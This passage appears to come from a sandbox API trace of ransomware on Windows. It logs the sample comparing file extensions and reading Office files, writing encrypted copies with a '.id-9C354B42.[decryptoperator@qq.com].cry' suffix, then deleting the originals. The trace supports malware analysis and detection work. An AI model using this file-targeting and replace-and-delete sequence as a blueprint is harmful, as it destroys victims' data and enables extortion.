Files\\Microsoft Shared\\ink\\en-US\\boxed-split.avi") returned 72 [0038.865] lstrlenW (lpString=".jpg") returned 4 [0038.865] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.865] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0038.865] lstrlenW (lpString="ea-sym.xml") returned 10 [0038.866] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0039.742] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=749) returned 1 [0039.742] CloseHandle (hObject=0x17c) returned 1 [0039.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml")) returned 0x20 [0039.742] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.742] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.743] lstrlenW (lpString=".doc") returned 4 [0039.743] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.743] lstrlenW (lpString=".docx") returned 5 [0039.743] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0039.743] lstrlenW (lpString=".pdf") returned 4 [0039.743] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.743] lstrlenW (lpString=".xls") returned 4 [0039.743] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.743] lstrlenW (lpString=".xlsx") returned 5 [0039.743] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0039.743] lstrlenW (lpString=".ppt") returned 4 [0039.743] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.743] lstrlenW (lpString=".zip") returned 4 [0039.743] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.743] lstrlenW (lpString=".rar") returned 4 [0039.743] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.743] lstrlenW (lpString=".bz2") returned 4 [0039.743] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.743] lstrlenW (lpString=".7z") returned 3 [0039.743] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.743] lstrlenW (lpString=".dbf") returned 4 [0039.743] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.743] lstrlenW (lpString=".1cd") returned 4 [0039.743] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.743] lstrlenW (lpString=".jpg") returned 4 [0039.743] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.743] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.744] lstrlenW (lpString=".doc") returned 4 [0039.744] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.744] lstrlenW (lpString=".docx") returned 5 [0039.744] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0039.744] lstrlenW (lpString=".pdf") returned 4 [0039.744] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.744] lstrlenW (lpString=".xls") returned 4 [0039.744] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.744] lstrlenW (lpString=".xlsx") returned 5 [0039.744] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0039.744] lstrlenW (lpString=".ppt") returned 4 [0039.744] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.744] lstrlenW (lpString=".zip") returned 4 [0039.744] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.744] lstrlenW (lpString=".rar") returned 4 [0039.744] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.744] lstrlenW (lpString=".bz2") returned 4 [0039.744] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.744] lstrlenW (lpString=".7z") returned 3 [0039.744] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.744] lstrlenW (lpString=".dbf") returned 4 [0039.744] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.744] lstrlenW (lpString=".1cd") returned 4 [0039.744] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0039.744] lstrlenW (lpString=".jpg") returned 4 [0039.744] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.745] lstrcmpiW (lpString1=".HTM", lpString2=".cry") returned 1 [0039.745] lstrlenW (lpString="README.HTM") returned 10 [0039.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0039.906] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=1941) returned 1 [0039.906] CloseHandle (hObject=0x1ac) returned 1 [0039.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 0x20 [0039.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0039.906] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.906] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0039.906] GetLastError () returned 0x0 [0039.906] ReadFile (in: hFile=0x1ac, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x795, lpOverlapped=0x0) returned 1 [0040.075] WriteFile (in: hFile=0x1a4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x7a0, lpOverlapped=0x0) returned 1 [0040.076] ReadFile (in: hFile=0x1ac, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.076] WriteFile (in: hFile=0x1a4, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0040.076] SetEndOfFile (hFile=0x1a4) returned 1 [0040.076] CloseHandle (hObject=0x1a4) returned 1 [0040.077] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.077] SetEndOfFile (hFile=0x1ac) returned 1 [0040.077] CloseHandle (hObject=0x1ac) returned 1 [0040.078] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.078] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 1 [0040.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.078] lstrlenW (lpString=".doc") returned 4 [0040.078] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0040.078] lstrlenW (lpString=".docx") returned 5 [0040.078] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0040.078] lstrlenW (lpString=".pdf") returned 4 [0040.078] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0040.078] lstrlenW (lpString=".xls") returned 4 [0040.078] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0040.078] lstrlenW (lpString=".xlsx") returned 5 [0040.078] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0040.078] lstrlenW (lpString=".ppt") returned 4 [0040.078] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0040.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.078] lstrlenW (lpString=".zip") returned 4 [0040.079] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0040.079] lstrlenW (lpString=".rar") returned 4 [0040.079] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0040.079] lstrlenW (lpString=".bz2") returned 4 [0040.079] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0040.079] lstrlenW (lpString=".7z") returned 3 [0040.079] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0040.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.079] lstrlenW (lpString=".dbf") returned 4 [0040.079] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0040.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.079] lstrlenW (lpString=".1cd") returned 4 [0040.079] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0040.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.079] lstrlenW (lpString=".jpg") returned 4 [0040.079] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0040.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.079] lstrlenW (lpString=".doc") returned 4 [0040.079] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0040.079] lstrlenW (lpString=".docx") returned 5 [0040.079] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0040.079] lstrlenW (lpString=".pdf") returned 4 [0040.079] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0040.079] lstrlenW (lpString=".xls") returned 4 [0040.079] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0040.079] lstrlenW (lpString=".xlsx") returned 5 [0040.079] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0040.079] lstrlenW (lpString=".ppt") returned 4 [0040.079] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0040.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.079] lstrlenW (lpString=".zip") returned 4 [0040.080] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0040.080] lstrlenW (lpString=".rar") returned 4 [0040.080] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0040.080] lstrlenW (lpString=".bz2") returned 4 [0040.080] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0040.080] lstrlenW (lpString=".7z") returned 3 [0040.080] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0040.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.080] lstrlenW (lpString=".dbf") returned 4 [0040.080] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0040.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.080] lstrlenW (lpString=".1cd") returned 4 [0040.080] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0040.080] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0040.080] lstrlenW (lpString=".jpg") returned 4 [0040.080] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0040.080] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.080] lstrlenW (lpString="SETUP.XML") returned 9 [0040.080] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0040.102] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=2296) returned 1 [0040.102] CloseHandle (hObject=0x1a4) returned 1 [0040.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 0x20 [0040.102] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0040.102] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.102] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.102] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.108] GetLastError () returned 0x0 [0040.108] ReadFile (in: hFile=0x1a4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x8f8, lpOverlapped=0x0) returned 1 [0040.195] WriteFile (in: hFile=0x1b8, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x900, lpOverlapped=0x0) returned 1 [0040.196] ReadFile (in: hFile=0x1a4, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.196] WriteFile (in: hFile=0x1b8, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.196] SetEndOfFile (hFile=0x1b8) returned 1 [0040.196] CloseHandle (hObject=0x1b8) returned 1 [0040.196] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.196] SetEndOfFile (hFile=0x1a4) returned 1 [0040.197] CloseHandle (hObject=0x1a4) returned 1 [0040.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.197] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml")) returned 1 [0040.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.198] lstrlenW (lpString=".doc") returned 4 [0040.198] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.198] lstrlenW (lpString=".docx") returned 5 [0040.198] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.198] lstrlenW (lpString=".pdf") returned 4 [0040.198] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.198] lstrlenW (lpString=".xls") returned 4 [0040.198] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.198] lstrlenW (lpString=".xlsx") returned 5 [0040.198] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.198] lstrlenW (lpString=".ppt") returned 4 [0040.198] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.198] lstrlenW (lpString=".zip") returned 4 [0040.198] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.198] lstrlenW (lpString=".rar") returned 4 [0040.198] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.198] lstrlenW (lpString=".bz2") returned 4 [0040.198] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.198] lstrlenW (lpString=".7z") returned 3 [0040.198] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.198] lstrlenW (lpString=".dbf") returned 4 [0040.198] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.198] lstrlenW (lpString=".1cd") returned 4 [0040.198] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.198] lstrlenW (lpString=".jpg") returned 4 [0040.198] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.199] lstrlenW (lpString=".doc") returned 4 [0040.199] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.199] lstrlenW (lpString=".docx") returned 5 [0040.199] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.199] lstrlenW (lpString=".pdf") returned 4 [0040.199] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.199] lstrlenW (lpString=".xls") returned 4 [0040.199] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.199] lstrlenW (lpString=".xlsx") returned 5 [0040.199] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.199] lstrlenW (lpString=".ppt") returned 4 [0040.199] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.199] lstrlenW (lpString=".zip") returned 4 [0040.199] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.199] lstrlenW (lpString=".rar") returned 4 [0040.199] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.199] lstrlenW (lpString=".bz2") returned 4 [0040.199] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.199] lstrlenW (lpString=".7z") returned 3 [0040.199] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.199] lstrlenW (lpString=".dbf") returned 4 [0040.199] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.199] lstrlenW (lpString=".1cd") returned 4 [0040.199] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML") returned 101 [0040.199] lstrlenW (lpString=".jpg") returned 4 [0040.199] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.199] lstrcmpiW (lpString1=".CHM", lpString2=".cry") returned -1 [0040.199] lstrlenW (lpString="OCT.CHM") returned 7 [0040.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.201] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=71236) returned 1 [0040.201] CloseHandle (hObject=0x1b8) returned 1 [0040.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm")) returned 0x20 [0040.201] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.201] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0040.202] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.202] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.202] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 